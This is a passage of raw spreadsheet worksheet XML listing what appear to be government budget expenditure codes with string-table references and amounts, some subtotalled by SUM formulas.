    <row r="803" ht="17.1" customHeight="1" spans="1:3">
      <c r="A803" s="705">
        <v>21107</v>
      </c>
      <c r="B803" s="706" t="s">
        <v>1549</v>
      </c>
      <c r="C803" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="804" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A804" s="705">
        <v>2110704</v>
      </c>
      <c r="B804" s="705" t="s">
        <v>1550</v>
      </c>
      <c r="C804" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="805" ht="17.1" customHeight="1" spans="1:3">
      <c r="A805" s="705">
        <v>2110799</v>
      </c>
      <c r="B805" s="705" t="s">
        <v>1551</v>
      </c>
      <c r="C805" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="806" ht="17.1" customHeight="1" spans="1:3">
      <c r="A806" s="705">
        <v>21108</v>
      </c>
      <c r="B806" s="706" t="s">
        <v>1552</v>
      </c>
      <c r="C806" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="807" ht="17.1" customHeight="1" spans="1:3">
      <c r="A807" s="705">
        <v>2110804</v>
      </c>
      <c r="B807" s="705" t="s">
        <v>1553</v>
      </c>
      <c r="C807" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="808" ht="17.1" customHeight="1" spans="1:3">
      <c r="A808" s="705">
        <v>2110899</v>
      </c>
      <c r="B808" s="705" t="s">
        <v>1554</v>
      </c>
      <c r="C808" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="809" ht="17.1" customHeight="1" spans="1:3">
      <c r="A809" s="705">
        <v>21109</v>
      </c>
      <c r="B809" s="706" t="s">
        <v>1555</v>
      </c>
      <c r="C809" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="810" ht="17.1" customHeight="1" spans="1:3">
      <c r="A810" s="705">
        <v>2110901</v>
      </c>
      <c r="B810" s="705" t="s">
        <v>1556</v>
      </c>
      <c r="C810" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="811" ht="17.1" customHeight="1" spans="1:3">
      <c r="A811" s="705">
        <v>21110</v>
      </c>
      <c r="B811" s="706" t="s">
        <v>1557</v>
      </c>
      <c r="C811" s="269">
        <v>52</v>
      </c>
    </row>
    <row r="812" ht="17.1" customHeight="1" spans="1:3">
      <c r="A812" s="705">
        <v>2111001</v>
      </c>
      <c r="B812" s="705" t="s">
        <v>1558</v>
      </c>
      <c r="C812" s="707">
        <v>52</v>
      </c>
    </row>
    <row r="813" ht="17.1" customHeight="1" spans="1:3">
      <c r="A813" s="705">
        <v>21111</v>
      </c>
      <c r="B813" s="706" t="s">
        <v>1559</v>
      </c>
      <c r="C813" s="269">
        <v>107</v>
      </c>
    </row>
    <row r="814" ht="17.1" customHeight="1" spans="1:3">
      <c r="A814" s="705">
        <v>2111101</v>
      </c>
      <c r="B814" s="705" t="s">
        <v>1560</v>
      </c>
      <c r="C814" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="815" ht="17.1" customHeight="1" spans="1:3">
      <c r="A815" s="705">
        <v>2111102</v>
      </c>
      <c r="B815" s="705" t="s">
        <v>1561</v>
      </c>
      <c r="C815" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="816" ht="17.1" customHeight="1" spans="1:3">
      <c r="A816" s="705">
        <v>2111103</v>
      </c>
      <c r="B816" s="705" t="s">
        <v>1562</v>
      </c>
      <c r="C816" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="817" ht="17.1" customHeight="1" spans="1:3">
      <c r="A817" s="705">
        <v>2111104</v>
      </c>
      <c r="B817" s="705" t="s">
        <v>1563</v>
      </c>
      <c r="C817" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="818" ht="17.1" customHeight="1" spans="1:3">
      <c r="A818" s="705">
        <v>2111199</v>
      </c>
      <c r="B818" s="705" t="s">
        <v>1564</v>
      </c>
      <c r="C818" s="707">
        <v>107</v>
      </c>
    </row>
    <row r="819" ht="17.1" customHeight="1" spans="1:3">
      <c r="A819" s="705">
        <v>21112</v>
      </c>
      <c r="B819" s="706" t="s">
        <v>1565</v>
      </c>
      <c r="C819" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="820" ht="17.1" customHeight="1" spans="1:3">
      <c r="A820" s="705">
        <v>2111201</v>
      </c>
      <c r="B820" s="705" t="s">
        <v>1566</v>
      </c>
      <c r="C820" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="821" ht="17.1" customHeight="1" spans="1:3">
      <c r="A821" s="705">
        <v>21113</v>
      </c>
      <c r="B821" s="706" t="s">
        <v>1567</v>
      </c>
      <c r="C821" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="822" ht="17.1" customHeight="1" spans="1:3">
      <c r="A822" s="705">
        <v>2111301</v>
      </c>
      <c r="B822" s="705" t="s">
        <v>1568</v>
      </c>
      <c r="C822" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="823" ht="17.1" customHeight="1" spans="1:3">
      <c r="A823" s="705">
        <v>21114</v>
      </c>
      <c r="B823" s="706" t="s">
        <v>1569</v>
      </c>
      <c r="C823" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="824" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A824" s="705">
        <v>2111401</v>
      </c>
      <c r="B824" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C824" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="825" ht="17.1" customHeight="1" spans="1:3">
      <c r="A825" s="705">
        <v>2111402</v>
      </c>
      <c r="B825" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C825" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="826" ht="17.1" customHeight="1" spans="1:3">
      <c r="A826" s="705">
        <v>2111403</v>
      </c>
      <c r="B826" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C826" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="827" ht="17.1" customHeight="1" spans="1:3">
      <c r="A827" s="705">
        <v>2111406</v>
      </c>
      <c r="B827" s="705" t="s">
        <v>1570</v>
      </c>
      <c r="C827" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="828" ht="17.1" customHeight="1" spans="1:3">
      <c r="A828" s="705">
        <v>2111407</v>
      </c>
      <c r="B828" s="705" t="s">
        <v>1571</v>
      </c>
      <c r="C828" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="829" ht="17.1" customHeight="1" spans="1:3">
      <c r="A829" s="705">
        <v>2111408</v>
      </c>
      <c r="B829" s="705" t="s">
        <v>1572</v>
      </c>
      <c r="C829" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="830" ht="17.1" customHeight="1" spans="1:3">
      <c r="A830" s="705">
        <v>2111411</v>
      </c>
      <c r="B830" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C830" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="831" ht="17.1" customHeight="1" spans="1:3">
      <c r="A831" s="705">
        <v>2111413</v>
      </c>
      <c r="B831" s="705" t="s">
        <v>1573</v>
      </c>
      <c r="C831" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="832" ht="17.1" customHeight="1" spans="1:3">
      <c r="A832" s="705">
        <v>2111450</v>
      </c>
      <c r="B832" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C832" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="833" ht="17.1" customHeight="1" spans="1:3">
      <c r="A833" s="705">
        <v>2111499</v>
      </c>
      <c r="B833" s="705" t="s">
        <v>1574</v>
      </c>
      <c r="C833" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="834" ht="17.1" customHeight="1" spans="1:3">
      <c r="A834" s="705">
        <v>21199</v>
      </c>
      <c r="B834" s="706" t="s">
        <v>1575</v>
      </c>
      <c r="C834" s="269">
        <v>253</v>
      </c>
    </row>
    <row r="835" ht="17.1" customHeight="1" spans="1:3">
      <c r="A835" s="705">
        <v>2119999</v>
      </c>
      <c r="B835" s="705" t="s">
        <v>1576</v>
      </c>
      <c r="C835" s="707">
        <v>253</v>
      </c>
    </row>
    <row r="836" ht="17.1" customHeight="1" spans="1:3">
      <c r="A836" s="705">
        <v>212</v>
      </c>
      <c r="B836" s="706" t="s">
        <v>1577</v>
      </c>
      <c r="C836" s="269">
        <v>25816</v>
      </c>
    </row>
    <row r="837" ht="17.1" customHeight="1" spans="1:3">
      <c r="A837" s="705">
        <v>21201</v>
      </c>
      <c r="B837" s="706" t="s">
        <v>1578</v>
      </c>
      <c r="C837" s="269">
        <f>SUM(C838:C847)</f>
        <v>9783</v>
      </c>
    </row>
    <row r="838" ht="17.1" customHeight="1" spans="1:3">
      <c r="A838" s="705">
        <v>2120101</v>
      </c>
      <c r="B838" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C838" s="707">
        <v>1930</v>
      </c>
    </row>
    <row r="839" ht="17.1" customHeight="1" spans="1:3">
      <c r="A839" s="705">
        <v>2120102</v>
      </c>
      <c r="B839" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C839" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="840" ht="17.1" customHeight="1" spans="1:3">
      <c r="A840" s="705">
        <v>2120103</v>
      </c>
      <c r="B840" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C840" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="841" ht="17.1" customHeight="1" spans="1:3">
      <c r="A841" s="705">
        <v>2120104</v>
      </c>
      <c r="B841" s="705" t="s">
        <v>1579</v>
      </c>
      <c r="C841" s="707">
        <v>2400</v>
      </c>
    </row>
    <row r="842" ht="17.1" customHeight="1" spans="1:3">
      <c r="A842" s="705">
        <v>2120105</v>
      </c>
      <c r="B842" s="705" t="s">
        <v>1580</v>
      </c>
      <c r="C842" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="843" ht="17.1" customHeight="1" spans="1:3">
      <c r="A843" s="705">
        <v>2120106</v>
      </c>
      <c r="B843" s="705" t="s">
        <v>1581</v>
      </c>
      <c r="C843" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="844" ht="17.1" customHeight="1" spans="1:3">
      <c r="A844" s="705">
        <v>2120107</v>
      </c>
      <c r="B844" s="705" t="s">
        <v>1582</v>
      </c>
      <c r="C844" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="845" ht="17.1" customHeight="1" spans="1:3">
      <c r="A845" s="705">
        <v>2120109</v>
      </c>
      <c r="B845" s="705" t="s">
        <v>1583</v>
      </c>
      <c r="C845" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="846" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A846" s="705">
        <v>2120110</v>
      </c>
      <c r="B846" s="705" t="s">
        <v>1584</v>
      </c>
      <c r="C846" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="847" ht="17.1" customHeight="1" spans="1:3">
      <c r="A847" s="705">
        <v>2120199</v>
      </c>
      <c r="B847" s="705" t="s">
        <v>1585</v>
      </c>
      <c r="C847" s="707">
        <v>5453</v>
      </c>
    </row>
    <row r="848" ht="17.1" customHeight="1" spans="1:3">
      <c r="A848" s="705">
        <v>21202</v>
      </c>
      <c r="B848" s="706" t="s">
        <v>1586</v>
      </c>
      <c r="C848" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="849" ht="17.1" customHeight="1" spans="1:3">
      <c r="A849" s="705">
        <v>2120201</v>
      </c>
      <c r="B849" s="705" t="s">
        <v>1587</v>
      </c>
      <c r="C849" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="850" ht="17.1" customHeight="1" spans="1:3">
      <c r="A850" s="705">
        <v>21203</v>
      </c>
      <c r="B850" s="706" t="s">
        <v>1588</v>
      </c>
      <c r="C850" s="269">
        <f>SUM(C851:C852)</f>
        <v>1306</v>
      </c>
    </row>
    <row r="851" ht="17.1" customHeight="1" spans="1:3">
      <c r="A851" s="705">
        <v>2120303</v>
      </c>
      <c r="B851" s="705" t="s">
        <v>1589</v>
      </c>
      <c r="C851" s="707">
        <v>980</v>
      </c>
    </row>
    <row r="852" ht="17.1" customHeight="1" spans="1:3">
      <c r="A852" s="705">
        <v>2120399</v>
      </c>
      <c r="B852" s="705" t="s">
        <v>1590</v>
      </c>
      <c r="C852" s="707">
        <v>326</v>
      </c>
    </row>
    <row r="853" ht="17.1" customHeight="1" spans="1:3">
      <c r="A853" s="705">
        <v>21205</v>
      </c>
      <c r="B853" s="706" t="s">
        <v>1591</v>
      </c>
      <c r="C853" s="269">
        <v>5891</v>
      </c>
    </row>
    <row r="854" ht="17.1" customHeight="1" spans="1:3">
      <c r="A854" s="705">
        <v>2120501</v>
      </c>
      <c r="B854" s="705" t="s">
        <v>1592</v>
      </c>
      <c r="C854" s="707">
        <v>5891</v>
      </c>
    </row>
    <row r="855" ht="17.1" customHeight="1" spans="1:3">
      <c r="A855" s="705">
        <v>21206</v>
      </c>
      <c r="B855" s="706" t="s">
        <v>1593</v>
      </c>
      <c r="C855" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="856" ht="17.1" customHeight="1" spans="1:3">
      <c r="A856" s="705">
        <v>2120601</v>
      </c>
      <c r="B856" s="705" t="s">
        <v>1594</v>
      </c>
      <c r="C856" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="857" ht="17.1" customHeight="1" spans="1:3">
      <c r="A857" s="705">
        <v>21299</v>
      </c>
      <c r="B857" s="706" t="s">
        <v>1595</v>
      </c>
      <c r="C857" s="269">
        <v>8836</v>
      </c>
    </row>
    <row r="858" ht="17.1" customHeight="1" spans="1:3">
      <c r="A858" s="705">
        <v>2129999</v>
      </c>
      <c r="B858" s="705" t="s">
        <v>1596</v>
      </c>
      <c r="C858" s="707">
        <v>8836</v>
      </c>
    </row>
    <row r="859" ht="17.1" customHeight="1" spans="1:3">
      <c r="A859" s="705">
        <v>213</v>
      </c>
      <c r="B859" s="706" t="s">
        <v>1597</v>
      </c>
      <c r="C859" s="269">
        <v>28273</v>
      </c>
    </row>
    <row r="860" ht="17.1" customHeight="1" spans="1:3">
      <c r="A860" s="705">
        <v>21301</v>
      </c>
      <c r="B860" s="706" t="s">
        <v>1598</v>
      </c>
      <c r="C860" s="269">
        <f>SUM(C861:C885)</f>
        <v>6713</v>
      </c>
    </row>
    <row r="861" ht="17.1" customHeight="1" spans="1:3">
      <c r="A861" s="705">
        <v>2130101</v>
      </c>
      <c r="B861" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C861" s="707">
        <v>2800</v>
      </c>
    </row>
    <row r="862" ht="17.1" customHeight="1" spans="1:3">
      <c r="A862" s="705">
        <v>2130102</v>
      </c>
      <c r="B862" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C862" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="863" ht="17.1" customHeight="1" spans="1:3">
      <c r="A863" s="705">
        <v>2130103</v>
      </c>
      <c r="B863" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C863" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="864" ht="17.1" customHeight="1" spans="1:3">
      <c r="A864" s="705">
        <v>2130104</v>
      </c>
      <c r="B864" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C864" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="865" ht="17.1" customHeight="1" spans="1:3">
      <c r="A865" s="705">
        <v>2130105</v>
      </c>
      <c r="B865" s="705" t="s">
        <v>1599</v>
      </c>
      <c r="C865" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="866" ht="17.1" customHeight="1" spans="1:3">
      <c r="A866" s="705">
        <v>2130106</v>
      </c>
      <c r="B866" s="705" t="s">
        <v>1600</v>
      </c>
      <c r="C866" s="707">
        <v>34</v>
      </c>
    </row>
    <row r="867" ht="17.1" customHeight="1" spans="1:3">
      <c r="A867" s="705">
        <v>2130108</v>
      </c>
      <c r="B867" s="705" t="s">
        <v>1601</v>
      </c>
      <c r="C867" s="707">
        <v>196</v>
      </c>
    </row>
    <row r="868" ht="17.1" customHeight="1" spans="1:3">
      <c r="A868" s="705">
        <v>2130109</v>
      </c>
      <c r="B868" s="705" t="s">
        <v>1602</v>
      </c>
      <c r="C868" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="869" ht="17.1" customHeight="1" spans="1:3">
      <c r="A869" s="705">
        <v>2130110</v>
      </c>
      <c r="B869" s="705" t="s">
        <v>1603</v>
      </c>
      <c r="C869" s="707">
        <v>4</v>
      </c>
    </row>
    <row r="870" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A870" s="705">
        <v>2130111</v>
      </c>
      <c r="B870" s="705" t="s">
        <v>1604</v>
      </c>
      <c r="C870" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="871" ht="17.1" customHeight="1" spans="1:3">
      <c r="A871" s="705">
        <v>2130112</v>
      </c>
      <c r="B871" s="705" t="s">
        <v>1605</v>
      </c>
      <c r="C871" s="707">
        <v>2</v>
      </c>
    </row>
    <row r="872" ht="17.1" customHeight="1" spans="1:3">
      <c r="A872" s="705">
        <v>2130114</v>
      </c>
      <c r="B872" s="705" t="s">
        <v>1606</v>
      </c>
      <c r="C872" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="873" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A873" s="705">
        <v>2130119</v>
      </c>
      <c r="B873" s="705" t="s">
        <v>1607</v>
      </c>
      <c r="C873" s="707">
        <v>15</v>
      </c>
    </row>
    <row r="874" ht="17.1" customHeight="1" spans="1:3">
      <c r="A874" s="705">
        <v>2130120</v>
      </c>
      <c r="B874" s="705" t="s">
        <v>1608</v>
      </c>
      <c r="C874" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="875" ht="17.1" customHeight="1" spans="1:3">
      <c r="A875" s="705">
        <v>2130121</v>
      </c>
      <c r="B875" s="705" t="s">
        <v>1609</v>
      </c>
      <c r="C875" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="876" ht="17.1" customHeight="1" spans="1:3">
      <c r="A876" s="705">
        <v>2130122</v>
      </c>
      <c r="B876" s="705" t="s">
        <v>1610</v>
      </c>
      <c r="C876" s="707">
        <v>337</v>
      </c>
    </row>
    <row r="877" ht="17.1" customHeight="1" spans="1:3">
      <c r="A877" s="705">
        <v>2130124</v>
      </c>
      <c r="B877" s="705" t="s">
        <v>1611</v>
      </c>
      <c r="C877" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="878" ht="17.1" customHeight="1" spans="1:3">
      <c r="A878" s="705">
        <v>2130125</v>
      </c>
      <c r="B878" s="705" t="s">
        <v>1612</v>
      </c>
      <c r="C878" s="707">
        <v>326</v>
      </c>
    </row>
    <row r="879" ht="17.1" customHeight="1" spans="1:3">
      <c r="A879" s="705">
        <v>2130126</v>
      </c>
      <c r="B879" s="705" t="s">
        <v>1613</v>
      </c>
      <c r="C879" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="880" ht="17.1" customHeight="1" spans="1:3">
      <c r="A880" s="705">
        <v>2130135</v>
      </c>
      <c r="B880" s="705" t="s">
        <v>1614</v>
      </c>
      <c r="C880" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="881" ht="17.1" customHeight="1" spans="1:3">
      <c r="A881" s="705">
        <v>2130142</v>
      </c>
      <c r="B881" s="705" t="s">
        <v>1615</v>
      </c>
      <c r="C881" s="707">
        <v>276</v>
      </c>
    </row>
    <row r="882" ht="17.1" customHeight="1" spans="1:3">
      <c r="A882" s="705">
        <v>2130148</v>
      </c>
      <c r="B882" s="705" t="s">
        <v>1616</v>
      </c>
      <c r="C882" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="883" ht="17.1" customHeight="1" spans="1:3">
      <c r="A883" s="705">
        <v>2130152</v>
      </c>
      <c r="B883" s="705" t="s">
        <v>1617</v>
      </c>
      <c r="C883" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="884" ht="17.1" customHeight="1" spans="1:3">
      <c r="A884" s="705">
        <v>2130153</v>
      </c>
      <c r="B884" s="705" t="s">
        <v>1618</v>
      </c>
      <c r="C884" s="707">
        <v>1543</v>
      </c>
    </row>
    <row r="885" spans="1:3">
      <c r="A885" s="705">
        <v>2130199</v>
      </c>
      <c r="B885" s="705" t="s">
        <v>1619</v>
      </c>
      <c r="C885" s="707">
        <v>1180</v>
      </c>
    </row>
    <row r="886" spans="1:3">
      <c r="A886" s="705">
        <v>21302</v>
      </c>
      <c r="B886" s="706" t="s">
        <v>1620</v>
      </c>
      <c r="C886" s="269">
        <f>SUM(C887:C907)</f>
        <v>801</v>
      </c>
    </row>
    <row r="887" spans="1:3">
      <c r="A887" s="705">
        <v>2130201</v>
      </c>
      <c r="B887" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C887" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="888" spans="1:3">
      <c r="A888" s="705">
        <v>2130202</v>
      </c>
      <c r="B888" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C888" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="889" spans="1:3">
      <c r="A889" s="705">
        <v>2130203</v>
      </c>
      <c r="B889" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C889" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="890" spans="1:3">
      <c r="A890" s="705">
        <v>2130204</v>
      </c>
      <c r="B890" s="705" t="s">
        <v>1621</v>
      </c>
      <c r="C890" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="891" spans="1:3">
      <c r="A891" s="705">
        <v>2130205</v>
      </c>
      <c r="B891" s="705" t="s">
        <v>1622</v>
      </c>
      <c r="C891" s="707">
        <v>150</v>
      </c>
    </row>
    <row r="892" spans="1:3">
      <c r="A892" s="705">
        <v>2130206</v>
      </c>
      <c r="B892" s="705" t="s">
        <v>1623</v>
      </c>
      <c r="C892" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="893" spans="1:3">
      <c r="A893" s="705">
        <v>2130207</v>
      </c>
      <c r="B893" s="705" t="s">
        <v>1624</v>
      </c>
      <c r="C893" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="894" spans="1:3">
      <c r="A894" s="705">
        <v>2130209</v>
      </c>
      <c r="B894" s="705" t="s">
        <v>1625</v>
      </c>
      <c r="C894" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="895" spans="1:3">
      <c r="A895" s="705">
        <v>2130211</v>
      </c>
      <c r="B895" s="705" t="s">
        <v>1626</v>
      </c>
      <c r="C895" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="896" spans="1:3">
      <c r="A896" s="705">
        <v>2130212</v>
      </c>
      <c r="B896" s="705" t="s">
        <v>1627</v>
      </c>
      <c r="C896" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="897" spans="1:3">
      <c r="A897" s="705">
        <v>2130213</v>
      </c>
      <c r="B897" s="705" t="s">
        <v>1628</v>
      </c>
      <c r="C897" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="898" spans="1:3">
      <c r="A898" s="705">
        <v>2130217</v>
      </c>
      <c r="B898" s="705" t="s">
        <v>1629</v>
      </c>
      <c r="C898" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="899" spans="1:3">
      <c r="A899" s="705">
        <v>2130220</v>
      </c>
      <c r="B899" s="705" t="s">
        <v>1630</v>
      </c>
      <c r="C899" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="900" spans="1:3">
      <c r="A900" s="705">
        <v>2130221</v>
      </c>
      <c r="B900" s="705" t="s">
        <v>1631</v>
      </c>
      <c r="C900" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="901" spans="1:3">
      <c r="A901" s="705">
        <v>2130223</v>
      </c>
      <c r="B901" s="705" t="s">
        <v>1632</v>
      </c>
      <c r="C901" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="902" spans="1:3">
      <c r="A902" s="705">
        <v>2130226</v>
      </c>
      <c r="B902" s="705" t="s">
        <v>1633</v>
      </c>
      <c r="C902" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="903" spans="1:3">
      <c r="A903" s="705">
        <v>2130227</v>
      </c>
      <c r="B903" s="705" t="s">
        <v>1634</v>
      </c>
      <c r="C903" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="904" spans="1:3">
      <c r="A904" s="705">
        <v>2130234</v>
      </c>
      <c r="B904" s="705" t="s">
        <v>1635</v>
      </c>
      <c r="C904" s="707">
        <v>101</v>
      </c>
    </row>
    <row r="905" spans="1:3">
      <c r="A905" s="705">
        <v>2130236</v>
      </c>
      <c r="B905" s="705" t="s">
        <v>1636</v>
      </c>
      <c r="C905" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="906" spans="1:3">
      <c r="A906" s="705">
        <v>2130237</v>
      </c>
      <c r="B906" s="705" t="s">
        <v>1605</v>
      </c>
      <c r="C906" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="907" spans="1:3">
      <c r="A907" s="705">
        <v>2130299</v>
      </c>
      <c r="B907" s="705" t="s">
        <v>1637</v>
      </c>
      <c r="C907" s="707">
        <v>550</v>
      </c>
    </row>
    <row r="908" spans="1:3">
      <c r="A908" s="705">
        <v>21303</v>
      </c>
      <c r="B908" s="706" t="s">
        <v>1638</v>
      </c>
      <c r="C908" s="269">
        <f>SUM(C909:C935)</f>
        <v>7545</v>
      </c>
    </row>
    <row r="909" spans="1:3">
      <c r="A909" s="705">
        <v>2130301</v>
      </c>
      <c r="B909" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C909" s="707">
        <v>863</v>
      </c>
    </row>
    <row r="910" spans="1:3">
      <c r="A910" s="705">
        <v>2130302</v>
      </c>
      <c r="B910" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C910" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="911" spans="1:3">
      <c r="A911" s="705">
        <v>2130303</v>
      </c>
      <c r="B911" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C911" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="912" spans="1:3">
      <c r="A912" s="705">
        <v>2130304</v>
      </c>
      <c r="B912" s="705" t="s">
        <v>1639</v>
      </c>
      <c r="C912" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="913" spans="1:3">
      <c r="A913" s="705">
        <v>2130305</v>
      </c>
      <c r="B913" s="705" t="s">
        <v>1640</v>
      </c>
      <c r="C913" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="914" spans="1:3">
      <c r="A914" s="705">
        <v>2130306</v>
      </c>
      <c r="B914" s="705" t="s">
        <v>1641</v>
      </c>
      <c r="C914" s="707">
        <v>700</v>
      </c>
    </row>
    <row r="915" spans="1:3">
      <c r="A915" s="705">
        <v>2130307</v>
      </c>
      <c r="B915" s="705" t="s">
        <v>1642</v>
      </c>
      <c r="C915" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="916" spans="1:3">
      <c r="A916" s="705">
        <v>2130308</v>
      </c>
      <c r="B916" s="705" t="s">
        <v>1643</v>
      </c>
      <c r="C916" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="917" spans="1:3">
      <c r="A917" s="705">
        <v>2130309</v>
      </c>
      <c r="B917" s="705" t="s">
        <v>1644</v>
      </c>
      <c r="C917" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="918" spans="1:3">
      <c r="A918" s="705">
        <v>2130310</v>
      </c>
      <c r="B918" s="705" t="s">
        <v>1645</v>
      </c>
      <c r="C918" s="707">
        <v>2500</v>
      </c>
    </row>
    <row r="919" spans="1:3">
      <c r="A919" s="705">
        <v>2130311</v>
      </c>
      <c r="B919" s="705" t="s">
        <v>1646</v>
      </c>
      <c r="C919" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="920" spans="1:3">
      <c r="A920" s="705">
        <v>2130312</v>
      </c>
      <c r="B920" s="705" t="s">
        <v>1647</v>
      </c>
      <c r="C920" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="921" spans="1:3">
      <c r="A921" s="705">
        <v>2130313</v>
      </c>
      <c r="B921" s="705" t="s">
        <v>1648</v>
      </c>
      <c r="C921" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="922" spans="1:3">
      <c r="A922" s="705">
        <v>2130314</v>
      </c>
      <c r="B922" s="705" t="s">
        <v>1649</v>
      </c>
      <c r="C922" s="707">
        <v>25</v>
      </c>
    </row>
    <row r="923" spans="1:3">
      <c r="A923" s="705">
        <v>2130315</v>
      </c>
      <c r="B923" s="705" t="s">
        <v>1650</v>
      </c>
      <c r="C923" s="707">
        <v>23</v>
      </c>
    </row>
    <row r="924" spans="1:3">
      <c r="A924" s="705">
        <v>2130316</v>
      </c>
      <c r="B924" s="705" t="s">
        <v>1651</v>
      </c>
      <c r="C924" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="925" spans="1:3">
      <c r="A925" s="705">
        <v>2130317</v>
      </c>
      <c r="B925" s="705" t="s">
        <v>1652</v>
      </c>
      <c r="C925" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="926" spans="1:3">
      <c r="A926" s="705">
        <v>2130318</v>
      </c>
      <c r="B926" s="705" t="s">
        <v>1653</v>
      </c>
      <c r="C926" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="927" spans="1:3">
      <c r="A927" s="705">
        <v>2130319</v>
      </c>
      <c r="B927" s="705" t="s">
        <v>1654</v>
      </c>
      <c r="C927" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="928" spans="1:3">
      <c r="A928" s="705">
        <v>2130321</v>
      </c>
      <c r="B928" s="705" t="s">
        <v>1655</v>
      </c>
      <c r="C928" s="707">
        <v>745</v>
      </c>
    </row>
    <row r="929" spans="1:3">
      <c r="A929" s="705">
        <v>2130322</v>
      </c>
      <c r="B929" s="705" t="s">
        <v>1656</v>
      </c>
      <c r="C929" s="707">
        <v>0</v>
      </c>
    </row>
